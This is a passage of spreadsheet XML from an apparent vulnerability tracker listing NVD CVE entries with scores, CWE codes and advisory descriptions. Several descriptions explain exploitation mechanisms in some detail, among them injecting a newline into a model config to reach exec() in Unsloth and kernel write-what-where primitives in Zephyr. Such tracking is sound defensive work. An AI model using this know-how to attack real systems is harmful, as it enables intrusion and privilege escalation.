      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>github, rust</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Network UPS Tools is a collection of programs which provide a common interface for monitoring and administering UPS, PDU and SCD hardware. Prior to commits 658b24e and 1aa31d1, the GitHub Actions script used to prepare NUT tarballs and update GitHub Checks statuses and PR comments about it was mis-structured in terms of mixing code running with higher privileges (single-use token generated with write permissions) and untrusted inputs (PR source branch). A malicious PR run from a fork could extract the GITHUB_TOKEN value. It could potentially be abused while it was valid (while the GHA job ran) to manipulate Git repository contents, commit checks/statuses, or issue/PR comments, according to permissions it was issued with. This issue has been patched via commits 658b24e and 1aa31d1.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54160</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82383</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function in Apache Roller 6.1.5 allows an unauthenticated remote attacker to persistently change a site-global configuration value (the frontpage weblog selection) on any installed instance, because the setup action remains anonymously reachable after installation and persists configuration without an authorization check. No optional feature or non-default configuration is required; the result can redirect or break the site's public frontpage, with administrative recovery available. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which restricts the write to global administrators.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82383</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91043</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to exhaust memory on the client host and cause a denial of service.
Mint.HTTP2 enforces the client's max_header_list_size setting only on the compressed size of an inbound header block, while RFC 9113 section 6.5.2 defines the limit on the decoded header list. An HPACK indexed field costs one byte on the wire and decodes to a dynamic table entry of up to 4 KB, and join_cookie_headers/1 in lib/mint/http2.ex copies every cookie value of a response into one new binary. A header block under the default 256 KB wire limit therefore makes the client allocate about 1 GB for a single response, and several such responses in one delivery exhaust the memory of the process that owns the connection or of the whole VM.
This issue affects mint: from 1.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91043</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82323</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows Exploitation of Trusted Identifiers.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82323</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82380</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in Apache Roller 6.1.5 allows a remote attacker to cause a logged-in user to perform state-changing actions under the victim's authority, because the CSRF validation filters accept a request that does not submit the required salt token, validating instead against a value the server itself generated for the request. No optional feature or non-default configuration is required; any logged-in author or administrator is affected when induced to visit a crafted page. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates only the submitted salt and applies the same check to multipart forms.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82380</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88805</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>go, suse</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Incorrect credential cleaning on logout could be used by remote attackers to keep access credentials even after the account was logged out. Affected is SUSE Rancher 2.15 before 2.15.2.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88805</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93348</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Unsloth Zoo versions 2025.9.9 before 2026.8.14, as implemented in Unsloth 2025.9.9 through 2026.8.19, contains a code injection vulnerability in the model-loading compile path where the get_transformers_model_type() function in hf_utils.py collects model_type values from nested model configurations without enforcing a character allowlist, allowing newlines and arbitrary Python source to survive normalization. Attackers can embed a newline in a nested model_type value within a malicious model's config.json to terminate the generated import statement and execute arbitrary Python code via exec() in unsloth_compile_transformers(), achieving remote code execution as the loading user when the model is loaded for training or inference.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93348</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93355</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>LiteLLM contains a weak authentication vulnerability that allows an attacker holding a valid JWT from the configured identity provider to authenticate as any existing user by exploiting an email-based fallback lookup in the JWT authentication flow without verifying the email_verified claim. Attackers can present a token with an unverified email address matching a victim's account to inherit the victim's role, including proxy_admin privileges, and permanently overwrite the victim's stored identity binding to retain persistent unauthorized access to administrative endpoints exposing API keys and user management.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93355</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102004</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in memory corruption within the memory management subsystem. Fixed in Version 26.09</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102004</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16513</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>The userspace verifier z_vrfy_rtio_sqe_copy_in_get_handles() in subsys/rtio/rtio_syscalls.c (subsys/rtio/rtio_handlers.c before v4.3.0) validated the RTIO object handle and the sqes input array, but not the handle out-parameter. On the first loop iteration it executed *handle = sqe, storing the kernel address of the newly acquired submission-queue entry through a pointer taken verbatim from user mode, with no K_SYSCALL_MEMORY_WRITE check in front of it.
Any user-mode thread that has been granted a struct rtio kernel object can invoke the syscall with an arbitrary address in handle. That is the ordinary way an unprivileged thread uses the RTIO API, for example via sensor_read_async_mempool() or the async ADC helpers, which call rtio_sqe_copy_in_get_handles() internally. The store happens in supervisor mode before any submission-entry validation, so it fires regardless of whether the SQE contents are subsequently rejected. Only builds with CONFIG_USERSPACE and CONFIG_RTIO are affected; without CONFIG_USERSPACE the verifier is not compiled and the caller is already privileged.
The write address is fully attacker-chosen and the written value is a pointer into the caller's own RTIO ring, whose contents the caller controls (the following *sqe = sqes[i] copies an attacker-supplied struct rtio_sqe into that slot). This yields a write-what-where primitive placing a pointer to attacker-controlled data at any kernel address, sufficient to corrupt kernel function pointers, thread structures, or memory-domain partition tables, and thus to escalate from user mode to kernel mode, defeating the isolation boundary CONFIG_USERSPACE is meant to enforce. At minimum it is a reliable kernel memory-corruption and crash primitive. The reporter reproduced the write on qemu_x86: a K_USER thread changed a supervisor global from NULL to a live kernel SQE pointer.
The fix adds K_SYSCALL_MEMORY_WRITE(handle, sizeof(*handle)) (guarded by the existing optional-NULL semantics) before the loop, so the destination must lie in the calling thread's writable memory domain or the thread is terminated by K_OOPS. The neighbouring verifier z_vrfy_rtio_cqe_get_mempool_buffer(), which checked its buff/buff_len out-parameters only for read although the implementation writes through them, was hardened separately by bea93400138 ("rtio: syscalls: validate output params as writable"); that residual was materially weaker, since a read check still confines the target to the caller's own memory domain.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16513</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18413</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The NXP MCUX LPADC driver did not honour that contract. mcux_lpadc_start_read() in drivers/adc/adc_mcux_lpadc.c performed no buffer-size check at all before assigning data-&gt;buffer = sequence-&gt;buffer. Each completed conversion then stores one 16-bit sample per enabled channel per sampling round through an unbounded *data-&gt;buffer++: in mcux_lpadc_isr() for interrupt-driven builds, and in mcux_lpadc_dma_callback() for DMA-driven builds on releases that have the DMA path. A sequence selecting two channels with a two-byte buffer, for example, has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to an LPADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can request far more samples than its buffer can hold: up to channels * 65536 samples into a two-byte buffer, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the ADC interrupt handler or the DMA completion callback), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix calls the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c from mcux_lpadc_start_read(). The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18413</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18414</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The ADI MAX32 driver did not honour that contract. start_read() in drivers/adc/adc_max32.c compared buffer_size, a byte count, against a sample count ((1 + extra_samplings)  channels), ignoring sizeof(uint16_t), so it accepted a buffer half the required size. The samples are then stored through the uint16_t  data-&gt;buffer by Wrap_MXC_ADC_GetData(), which writes two bytes per sample and advances the pointer by one uint16_t: in adc_max32_start_channel() for synchronous reads, and in adc_max32_isr() for asynchronous ones. A sequence selecting two channels with a two-byte buffer, for example, passes the check and has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to a MAX32 ADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can make the driver write twice as many bytes as its buffer holds. Because the check scales with extra_samplings, the overrun equals the length of the buffer itself, up to channels * 65536 bytes past its end, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the system call itself, the ADC context timer, or the ADC interrupt handler for asynchronous reads), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix replaces that check in start_read() with a call to the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c, passing sizeof(uint16_t) as the sample size. The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18414</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4556</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>41c37e40-543d-43a2-b660-2fee83ea851a</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Exam4 is affected by a local privilege escalation vulnerability in the com.extegrity.LogTool privileged helper, which communicates with the application via XPC. The [ConsoleLogHelper copyConsoleIntoFileFromStartDate:] method executes a syslog command using attacker-controlled parameters without proper sanitization, enabling command injection. Successful exploitation allows a local attacker to execute arbitrary commands with root privileges through LaunchSynchronous.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4556</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45562</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
